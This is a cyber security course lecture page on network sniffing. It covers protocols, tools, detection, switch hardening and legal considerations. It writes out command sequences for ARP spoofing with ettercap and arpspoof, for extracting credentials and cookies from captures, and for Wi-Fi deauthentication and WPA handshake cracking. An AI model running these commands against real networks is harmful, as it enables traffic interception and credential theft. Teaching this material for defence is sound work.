Skip to main content
Milav
  1. Resources/
  2. Study Materials/
  3. Information & Communication Technology Engineering/
  4. ICT Semester 5/
  5. Cyber Security (4353204)/

10 mins· ·
Milav Dabgar
Author
Milav Dabgar
Experienced lecturer in the electrical and electronic manufacturing industry. Skilled in Embedded Systems, Image Processing, Data Science, MATLAB, Python, STM32. Strong education professional with a Master’s degree in Communication Systems Engineering from L.D. College of Engineering - Ahmedabad.
Sniffing

Sniffing

Network Traffic Interception and Analysis

Understanding Packet Capture, Analysis, and Security Implications

Man-in-the-Middle Attack

Network Sniffing Overview

Network Sniffing: The process of capturing, intercepting, and analyzing network traffic as it passes through network infrastructure to examine data packets and extract information.

Core Concepts:

  • Packet Capture: Intercepting data packets from network interfaces
  • Traffic Analysis: Examining packet contents and patterns
  • Protocol Decoding: Understanding various network protocols
  • Data Extraction: Retrieving useful information from packets
  • Network Monitoring: Continuous traffic surveillance
  • Security Assessment: Identifying vulnerabilities and threats
Dual Purpose: Network sniffing serves both legitimate network administration and security purposes, as well as malicious surveillance and attack activities

Types of Network Sniffing

Passive Sniffing:

  • Method: Listening to network traffic without interaction
  • Detection: Difficult to detect by network devices
  • Network Type: Effective on hubs and wireless networks
  • Traffic Access: Only traffic sent to or through sniffer
  • Examples: Hub-based networks, wireless monitoring
  • Stealth: Completely undetectable to targets

Active Sniffing:

  • Method: Actively manipulating network to capture traffic
  • Detection: May be detectable through network monitoring
  • Network Type: Required for switched network environments
  • Traffic Access: Can capture traffic not normally accessible
  • Examples: ARP spoofing, MAC flooding, DHCP attacks
  • Stealth: May generate suspicious network activity

Network Infrastructure Impact:

  • Hub Networks: All traffic visible to all ports (broadcast domain)
  • Switched Networks: Traffic segmented by MAC address tables
  • Wireless Networks: Radio frequency transmission accessible to all
  • Router Networks: Inter-VLAN traffic may be observable
  • Internet Backbones: High-volume traffic aggregation points

Network Protocols and Vulnerability

Vulnerable Protocols:

  • HTTP: Unencrypted web traffic
  • FTP: File transfer with plain text credentials
  • Telnet: Unencrypted remote access
  • SMTP: Email transmission without encryption
  • POP3/IMAP: Email retrieval protocols
  • SNMP v1/v2: Network management protocols

Partially Vulnerable:

  • HTTPS: Encrypted but metadata visible
  • SSH: Encrypted but connection patterns visible
  • VPN: Tunnel endpoints and traffic volume
  • DNS: Query names may be visible
  • NTP: Time synchronization data
  • DHCP: IP assignment information

Protected Protocols:

  • TLS/SSL: Transport layer security
  • IPSec: Network layer encryption
  • WPA3: Strong wireless encryption
  • SFTP: Secure file transfer
  • HTTPS: Encrypted web communications
  • SNMPv3: Authenticated SNMP
Protocol Stack Sniffing Example:

Layer 1 (Physical): Radio frequency, electrical signals
Layer 2 (Data Link): MAC addresses, frame headers
Layer 3 (Network): IP addresses, routing information
Layer 4 (Transport): TCP/UDP ports, sequence numbers
Layer 5+ (Application): HTTP, FTP, email content

Captured Data:
• Source/Destination MAC: 00:11:22:33:44:55 → 66:77:88:99:aa:bb
• Source/Destination IP: 192.168.1.100 → 10.0.0.50
• Protocol: TCP Port 80 (HTTP)
• Payload: GET /login.php HTTP/1.1 + form data

Network Sniffing Tools and Software

Professional Tools:

  • Wireshark: Most popular network protocol analyzer
  • tcpdump: Command-line packet analyzer
  • NetworkMiner: Network forensic analysis tool
  • Omnipeek: Commercial network analysis suite
  • SolarWinds NPM: Enterprise network monitoring
  • PRTG: Network monitoring solution

Penetration Testing Tools:

  • Ettercap: Comprehensive sniffing suite
  • Bettercap: Modern network attack framework
  • dSniff: Collection of sniffing tools
  • Cain & Abel: Windows password recovery tool
  • Kismet: Wireless network detector
  • airodump-ng: WiFi packet capture

Specialized Sniffers:

  • MailSnarf: Email message sniffing
  • URLSnarf: HTTP request capturing
  • WebSpy: Web browsing activity monitoring
  • SSHMitM: SSH connection interception
  • DNSSpoof: DNS response forging
  • Fragrouter: Network packet fragmentation

Tool Selection Criteria:

  • Protocol Support: Comprehensive protocol decoding capabilities
  • Performance: High-speed packet capture and analysis
  • User Interface: Intuitive analysis and visualization
  • Filtering: Advanced packet filtering and search
  • Export Options: Multiple output formats
  • Platform Support: Operating system compatibility

Wireshark: The Ultimate Network Analyzer

Wireshark: Free, open-source network protocol analyzer that provides deep inspection of network traffic with comprehensive protocol support and analysis capabilities.
Wireshark Key Features and Usage:

# Installation and Basic Usage
sudo apt install wireshark
sudo usermod -aG wireshark $USER
wireshark

# Command-line equivalent (tshark)
tshark -i eth0 -w capture.pcap
tshark -r capture.pcap -Y "http"

Key Features:
Live Capture: Real-time packet capture from network interfaces
Deep Inspection: Layer 2-7 protocol analysis
Rich Filtering: Display and capture filters
Statistical Analysis: Traffic patterns and trends
Expert System: Automatic problem detection
Extensibility: Plugin architecture and scripting

Common Display Filters:
ip.addr == 192.168.1.100
tcp.port == 80 or tcp.port == 443
http.request.method == "POST"
dns.flags.response == 0
tcp.analysis.flags && !tcp.analysis.window_update

Active Sniffing Attack Techniques

Active Sniffing: Techniques that manipulate network infrastructure or protocols to redirect or intercept traffic that wouldn't normally be accessible.

ARP Spoofing/Poisoning:

  • Method: Send fake ARP responses
  • Effect: Redirect traffic through attacker
  • Target: Switched network environments
  • Detection: ARP table monitoring
  • Tools: Ettercap, Bettercap, ARPspoof
  • Mitigation: Static ARP entries, DAI

MAC Flooding:

  • Method: Overflow switch MAC address table
  • Effect: Force switch into hub mode
  • Target: Older or vulnerable switches
  • Detection: Switch log analysis
  • Tools: macof, Yersinia
  • Mitigation: Port security, MAC limits

DHCP Attacks:

  • DHCP Spoofing: Rogue DHCP server
  • DHCP Starvation: Exhaust IP pool
  • Default Gateway: Traffic redirection
  • DNS Server: DNS poisoning setup

DNS Spoofing:

  • Cache Poisoning: Corrupt DNS cache
  • Response Injection: Fake DNS responses
  • Domain Hijacking: Redirect domains
  • Pharming: Traffic misdirection

SSL/TLS Attacks:

  • SSL Stripping: Downgrade to HTTP
  • Certificate Spoofing: Fake certificates
  • MITM Proxies: Transparent proxying
  • HSTS Bypass: Bypass security headers

ARP Spoofing Attack Example

ARP Spoofing: Man-in-the-middle attack that exploits the Address Resolution Protocol to intercept network traffic between hosts.
ARP Spoofing Attack Steps:

# 1. Network Discovery
nmap -sn 192.168.1.0/24
arp -a

# 2. Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl net.ipv4.ip_forward=1

# 3. ARP Spoofing with ettercap
ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
ettercap -T -i eth0 -M arp /192.168.1.1-254//

# 4. Alternative with arpspoof
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

# 5. Capture Traffic
tcpdump -i eth0 -w mitm_capture.pcap
wireshark -i eth0

# 6. Analysis
# View captured credentials, cookies, and sensitive data
tshark -r mitm_capture.pcap -Y "http.request.method==POST"
tshark -r mitm_capture.pcap -T fields -e http.cookie

Wireless Network Sniffing

Wireless Sniffing: Capturing and analyzing wireless network traffic, taking advantage of the broadcast nature of radio frequency communications.

WiFi Sniffing Process:

  • Monitor Mode: Enable wireless interface monitoring
  • Channel Hopping: Scan across all WiFi channels
  • Frame Capture: Collect 802.11 management frames
  • Beacon Analysis: Identify access points and networks
  • Client Tracking: Monitor device associations
  • Traffic Analysis: Analyze captured packets

Wireless Attack Vectors:

  • Open Networks: Unencrypted traffic capture
  • WEP Cracking: Weak encryption key recovery
  • WPA Handshake: Capture authentication handshakes
  • Evil Twin: Rogue access point attacks
  • Deauthentication: Force client reconnections
  • Packet Injection: Inject malicious frames
Wireless Sniffing Commands:

# Enable monitor mode
airmon-ng start wlan0
iwconfig wlan0mon mode monitor

# Discover wireless networks
airodump-ng wlan0mon
kismet -c wlan0mon

# Capture specific network traffic
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauthentication attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# WPA handshake analysis
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

Password and Credential Sniffing

Credential Harvesting: Extracting usernames, passwords, and authentication tokens from captured network traffic and protocols.

HTTP Authentication:

  • Basic Auth: Base64 encoded credentials
  • Form Data: POST request parameters
  • Cookies: Session and authentication tokens
  • Headers: Custom authentication headers
  • URLs: Credentials in query parameters

Protocol Credentials:

  • FTP: USER and PASS commands
  • Telnet: Login sequences
  • SMTP: AUTH LOGIN commands
  • POP3/IMAP: Authentication exchanges
  • SNMP: Community strings

Advanced Techniques:

  • Session Hijacking: Cookie and token theft
  • Kerberos: Ticket extraction
  • NTLM: Challenge-response capture
  • SSL/TLS: Certificate and key extraction
  • VPN: IPSec and OpenVPN credentials
Credential Extraction Examples:

# HTTP Basic Authentication (Wireshark filter)
http.authbasic

# Extract FTP credentials
tshark -r capture.pcap -Y "ftp.request.command==USER or ftp.request.command==PASS"

# Find HTTP POST data
tshark -r capture.pcap -Y "http.request.method==POST" -T fields -e http.file_data

# Using dsniff tools
dsniff -i eth0
urlsnarf -i eth0
mailsnarf -i eth0

# Extract cookies and tokens
tshark -r capture.pcap -Y "http.cookie" -T fields -e http.cookie
tshark -r capture.pcap -Y "http.authorization" -T fields -e http.authorization

Sniffing Detection Techniques

Detection Challenge: Passive sniffing is inherently difficult to detect, while active sniffing may leave observable traces in network traffic and logs.

Passive Sniffing Detection:

  • Physical Inspection: Unauthorized network taps
  • Port Monitoring: Unexpected port mirroring
  • Device Inventory: Unknown network interfaces
  • Performance Impact: Network latency changes
  • Promiscuous Mode: Network interface status
  • Switch Logs: Port configuration changes

Active Sniffing Detection:

  • ARP Table Monitoring: Duplicate or changing entries
  • MAC Address Tracking: Spoofed addresses
  • Network Latency: Increased response times
  • DHCP Logs: Multiple servers or conflicts
  • DNS Query Analysis: Suspicious resolutions
  • Certificate Warnings: SSL/TLS anomalies
Detection Tools and Commands:

# Check for promiscuous mode interfaces
ip link show
ifconfig -a | grep PROMISC

# Monitor ARP table changes
arp -a > arp_baseline.txt
watch -n 5 'arp -a | diff - arp_baseline.txt'

# Detect ARP spoofing with arpwatch
arpwatch -i eth0

# Check for duplicate IP addresses
arping -D 192.168.1.100

# Monitor DNS responses
dig @8.8.8.8 example.com
dig @192.168.1.1 example.com

# SSL certificate verification
openssl s_client -connect example.com:443 -servername example.com

Sniffing Prevention and Countermeasures

Defense Strategy: Multi-layered approach combining network segmentation, encryption, monitoring, and access controls to prevent or mitigate sniffing attacks.

Network Security:

  • Switch Security: Port security, MAC limiting
  • VLAN Segmentation: Network isolation
  • Dynamic ARP Inspection: ARP validation
  • DHCP Snooping: DHCP security
  • Private VLANs: Host isolation
  • Network Access Control: 802.1X authentication

Encryption and Protocols:

  • HTTPS: Web traffic encryption
  • SSH: Secure remote access
  • VPN: Network tunnel encryption
  • WPA3: Strong wireless encryption
  • IPSec: Network layer security
  • TLS: Transport layer security

Monitoring and Detection:

  • Network Monitoring: Traffic analysis
  • Intrusion Detection: IDS/IPS deployment
  • SIEM Integration: Log correlation
  • Anomaly Detection: Behavioral analysis
  • Honeypots: Deception technology
  • Threat Intelligence: IOC monitoring
Switch Security Configuration:

# Enable port security
interface fastethernet 0/1
switchport mode access
switchport port-security
switchport port-security maximum 2
switchport port-security violation restrict

# Enable DHCP snooping
ip dhcp snooping
ip dhcp snooping vlan 10
interface fastethernet 0/24
ip dhcp snooping trust

# Enable Dynamic ARP Inspection
ip arp inspection vlan 10
interface fastethernet 0/24
ip arp inspection trust

Legal and Ethical Considerations

Legal Framework: Network sniffing activities must comply with applicable laws, regulations, and organizational policies regarding privacy and unauthorized access.

Legitimate Uses:

  • Network Administration: Troubleshooting and optimization
  • Security Monitoring: Threat detection and analysis
  • Forensic Investigation: Incident response and evidence
  • Compliance Auditing: Regulatory requirement validation
  • Penetration Testing: Authorized security assessment
  • Research: Academic and security research

Legal Requirements:

  • Authorization: Explicit permission from network owners
  • Scope Definition: Clear boundaries and limitations
  • Data Protection: Privacy law compliance (GDPR, HIPAA)
  • Employee Notification: Workplace monitoring disclosure
  • Log Retention: Data retention and destruction policies
  • Chain of Custody: Evidence handling procedures

Best Practice Guidelines:

  • Written Policies: Clear organizational guidelines for network monitoring
  • Access Controls: Restrict sniffing tool access to authorized personnel
  • Training: Proper training on legal and ethical use
  • Documentation: Maintain detailed records of monitoring activities
  • Regular Review: Periodic policy and procedure updates
  • Incident Response: Procedures for handling discovered violations

Advanced Sniffing and Evasion Techniques

Advanced Methods: Sophisticated sniffing techniques used by advanced attackers to bypass security controls and evade detection.

Steganographic Sniffing:

  • Covert Channels: Hidden communication methods
  • Protocol Tunneling: Data hiding in legitimate protocols
  • Timing Attacks: Information extraction via timing
  • Side Channels: Electromagnetic and acoustic sniffing
  • Traffic Analysis: Metadata and pattern analysis

Evasion Techniques:

  • Anti-Detection: Avoiding security tool signatures
  • Traffic Mimicry: Disguising malicious traffic
  • Low and Slow: Gradual data exfiltration
  • Protocol Obfuscation: Traffic pattern masking
  • Distributed Sniffing: Multiple collection points

Emerging Threats:

  • AI-Powered Analysis: Machine learning for traffic analysis
  • IoT Sniffing: Internet of Things device monitoring
  • 5G Networks: Next-generation wireless sniffing
  • Cloud Traffic: Virtualized network monitoring
  • Container Networks: Docker and Kubernetes sniffing
  • SDN Environments: Software-defined network monitoring

Incident Response for Sniffing Attacks

Response Strategy: Systematic approach to identifying, containing, and remediating network sniffing incidents while preserving evidence.
Sniffing Incident Response Process:

1. Detection and Analysis:
• Network anomaly identification
• Traffic pattern analysis
• Device and user behavior assessment
• Scope and impact evaluation

2. Containment:
• Isolate suspected compromised systems
• Block suspicious network connections
• Disable compromised accounts
• Prevent lateral movement

3. Investigation:
• Packet capture analysis
• Log file examination
• Device forensic analysis
• Timeline reconstruction

4. Eradication:
• Remove sniffing tools and malware
• Patch identified vulnerabilities
• Strengthen security controls
• Update security policies

5. Recovery and Monitoring:
• Restore affected systems
• Implement enhanced monitoring
• Validate security improvements
• Continuous threat hunting

Key Takeaways

  • Network sniffing is both a legitimate network administration tool and security threat
  • Passive sniffing is harder to detect than active sniffing techniques
  • Switched networks require active sniffing methods like ARP spoofing
  • Wireless networks are particularly vulnerable to sniffing attacks
  • Encryption is the primary defense against traffic interception
  • Network segmentation and access controls reduce sniffing exposure
  • Detection requires monitoring for network anomalies and behaviors
  • Legal authorization is required for legitimate sniffing activities
Remember: Network sniffing capabilities should be used responsibly with proper authorization and within legal boundaries to improve network security rather than compromise it

Thank You

Questions & Discussion

Next: Session Hijacking